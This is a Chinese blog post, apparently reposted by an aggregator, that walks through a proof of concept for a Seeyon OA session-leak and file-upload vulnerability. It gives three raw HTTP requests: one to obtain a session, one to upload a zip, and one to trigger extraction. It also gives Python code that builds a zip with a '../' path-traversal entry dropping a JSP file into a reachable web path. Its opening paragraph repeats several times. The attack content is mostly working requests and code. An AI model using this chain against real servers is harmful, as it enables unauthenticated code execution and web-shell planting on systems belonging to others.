致远Session泄露+文件上传poc分析
接触到了这个漏洞,但是本漏洞需要上传一个zip压缩包。而且zip压缩包网上的poc是没有提供的。无奈自己只能从头分析了网上流传的poc:https://blog.csdn.net/maverickpi 2022-9-16 09:59:59 Author: HACK安全(查看原文) 阅读量:98 收藏
接触到了这个漏洞,但是本漏洞需要上传一个zip压缩包。而且zip压缩包网上的poc是没有提供的。无奈自己只能从头分析了网上流传的poc:https://blog.csdn.net/maverickpi 2022-9-16 09:59:59 Author: HACK安全(查看原文) 阅读量:98 收藏
接触到了这个漏洞,但是本漏洞需要上传一个zip压缩包。而且zip压缩包网上的poc是没有提供的。无奈自己只能从头分析了
网上流传的poc:https://blog.csdn.net/maverickpig/article/details/118916085
分为三个包
包一,主要是用来获取Session
POST /seeyon/thirdpartyController.do HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 133Content-Type: application/x-www-form-urlencodedmethod=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
包二,用来上传一个zip(这里稍后会有制作ZIP的代码)
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeCookie: 获取的SessionContent-Length: 528Content-Type: multipart/form-data; boundary=2a0e9dd602fea2b6f80d3a5db1d11591--2a0e9dd602fea2b6f80d3a5db1d11591Content-Disposition: form-data; name="file"; filename="y.zip"zip内容--2a0e9dd602fea2b6f80d3a5db1d11591--
Zip压缩制作,在查看网上结构的时候,发现了不同,具体如下
所以用代码实现即可,会生成y.zip
import iodef write_zipFile(Filename,Content):with zipfile.ZipFile("y.zip", mode='a', compression=zipfile.ZIP_DEFLATED, ) as zf:zf.writestr('layout.xml', "")zf.writestr(Filename, Content)Filename = "../7891.jsp"Content = "<% out.println(new String(\"Hello\"));new java.io.File(application.getRealPath(request.getServletPath())).delete();%>"data = write_zipFile(Filename,Content)
如果想不想生成zip的话,直接使用如下代码
def custom_build_zip(path,content):zip_buffer = io.BytesIO()with zipfile.ZipFile(zip_buffer, mode='a',compression=zipfile.ZIP_DEFLATED) as zf:zf.writestr('layout.xml', "")zf.writestr("../"+path, content)return zip_buffer.getvalue()
之后上传zip之后,通过返回包拿到一个ID
最终在进行解压
POST /seeyon/ajax.do HTTP/1.1Host: 获取的SessionUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeCookie: 获取的SessionContent-Type: application/x-www-form-urlencodedContent-Length: 157method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22日期%22%2C%22获取的ID%22%5D
在解压之后,访问路径为:
localhost://seeyon/common/designer/pageLayout/压缩包jsp文件名
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NjU0MjA0Ng==&mid=2247486360&idx=1&sn=a6d9afba3692959b03dc7f5031f5b985&chksm=ce480329f93f8a3f4f4b21114d5a41bf23ca9204d6f37322da5719d635c1627cb0983d8e0e5a#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh